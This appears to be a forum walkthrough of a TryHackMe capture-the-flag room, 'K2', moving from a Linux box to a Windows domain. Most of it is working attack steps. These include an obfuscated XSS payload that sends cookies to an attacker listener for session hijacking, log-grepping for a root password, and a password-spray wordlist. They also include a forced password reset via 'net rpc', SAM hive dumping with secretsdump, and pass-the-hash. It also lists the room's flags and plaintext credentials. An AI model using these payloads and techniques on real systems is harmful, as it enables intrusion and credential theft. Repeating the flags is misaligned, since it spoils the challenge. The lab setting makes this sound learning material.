Yes it is! You can connect to James using password found

$ ssh [email protected]                                                                                                                   
[email protected]'s password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-150-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 28 Sep 2024 01:12:31 PM UTC

  System load:  0.17              Processes:             136
  Usage of /:   74.1% of 8.87GB   Users logged in:       0
  Memory usage: 18%               IPv4 address for eth0: 10.10.66.45
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

22 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Sep 28 13:11:55 2024 from 10.9.3.170
james@k2:~$ 

I’ll drop the answers & flag later on.

The server have 2 users being james and rose we need to get to rose as she’s member of the group sudo

james@k2:/home/rose/k2_site/static$ id rose
uid=1001(rose) gid=1001(rose) groups=1001(rose),27(sudo)
james@k2:/home/rose/k2_site/static$ 

Good!! “I’m confused about how to obtain the token and session on admin.k2.”

Make a python web server using this :

$ python3 -m http.server

Then make an account on it.k2.thm and send this payload as the message description. Don’t forget to change your IP and PORT

<script>var+doc+%3d+window['document']%3bvar+cookie+%3d+doc['co'+%2b+'okie']%3bfetch('http%3a//YOUR_IP%3aYOUR_PORT%3fcookie%3d'+%2b+cookie)%3b</script>

Wait for a bit and you’ll see cookie=session=[Token] copy the token and head to admin.k2.thm, inspect > storage and then add a session cookie with a value of the token that you got.

Once done don’t do anything else other than going to http://admin.k2.thm/dashboard and you’ll be in !

Root path:

As james, running id will show our current groups, one of them is adm.

james@k2:/$ id
uid=1002(james) gid=1002(james) groups=1002(james),4(adm)
james@k2:/$

Usually members of the group adm have permissions to read log files located inside /var/log/ - Hacktricks

Grepping on “rose” in /var/log will get us root’s password.

james@k2:/$ grep -iR rose /var/log 2>/dev/null

Once you’re root u just need to read /home/rose/.bash_history for her password.

For those interested in points. Even though I highly advice doing the room for learning purposes, the steps are clear and understandable.

• User Flag: THM{9e04a7419a2b7a86163496271a8a95dd}
• Root Flag: THM{c6f684e3b1089cd75f205f93de9fe93d}
• Usernames and Passwords : james:Pwd@9tLNrC3!,root:RdzQ7MSKt)fNaz3!,rose:vRMkaVgdfxhW!8
• Full Names: James Bold, Rose Bud

james user flag :

i thought its rose password mybad its root passowrd acatully lol​:thinking:

Haha that’s what I thought too at first but it did work for root. For rose password it was quite easy to tell where it was since the .bash_history wasn’t pointed to /dev/null

Machine 2 - Middle Camp

User Flag

So the initial foothold should be finding an existing user and the corresponding password as the Guest account is deactivated. The task 2 description contains :

Use all of the information gathered from your previous findings in order to keep making your way to the top.

We just need to make a wordlist of users & passwords found on the first box, use nxc and you’ll find a valid set of credentials.

USERS :

james
rose
bob
steve
cait
xu
ash
James.Bold
Rose.Bud
j.bold
j.smith
r.bud
james.b
rose.b

Passwords :

Pwd@9tLNrC3!
VrMAogdfxW!9
PasSW0Rd321
St3veRoxx32
PartyAlLDaY!32
L0v3MyDog!3!
PikAchu!IshoesU!
vRMkaVgdfxhW!8
RdzQ7MSKt)fNaz3!

Once you find the valid credentials you’ll find notes.txt and note_to_james.txt

*Evil-WinRM* PS C:\Users\r.bud\Documents> type notes.txt
Done:
1. Note was sent and James has already performed the required action. They have informed me that they kept the base password the same, they just added two more characters to meet the criteria. It is easier for James to remember it that way.

2. James's password meets the criteria.

Pending:
1. Give James Remote Access.
*Evil-WinRM* PS C:\Users\r.bud\Documents> type note_to_james.txt
Hello James:

Your password "rockyou" was found to only contain alphabetical characters. I have removed your Remote Access for now.

At the very least adhere to the new password policy:
1. Length of password must be in between 6-12 characters
2. Must include at least 1 special character
3. Must include at least 1 number between the range of 0-999
*Evil-WinRM* PS C:\Users\r.bud\Documents>

You need to craft a custom wordlist to generate a list of passwords based on the password policy and what have been said in notes.txt

once you find the password, use bloodhound and retrieve james groups & permissions.

Run the following command on your machine :

net rpc password "j.smith" 'P1ssword!' -U 'k2.thm/j.bold%#8rockyou' -S "Machine_IP"

and you get j.smith password changed, connect to it using Evil-Winrm and you’ll get the user.txt

Root Hash & Flag

Once you’re on j.smith you can check permissions using whoami /priv and you’ll see SeBackupPrivilege, use that to download HKLM\SYSTEM and HKLM\SAM download them to your machine and use secretsdump to retrieve Admin hash, you can submit that!

$ python3 secretsdump.py -sam SAM -system SYSTEM LOCAL

Once you have the hash, you can perform a pass-the-hash using evil-winrm, connect to administrator and retrieve root flag!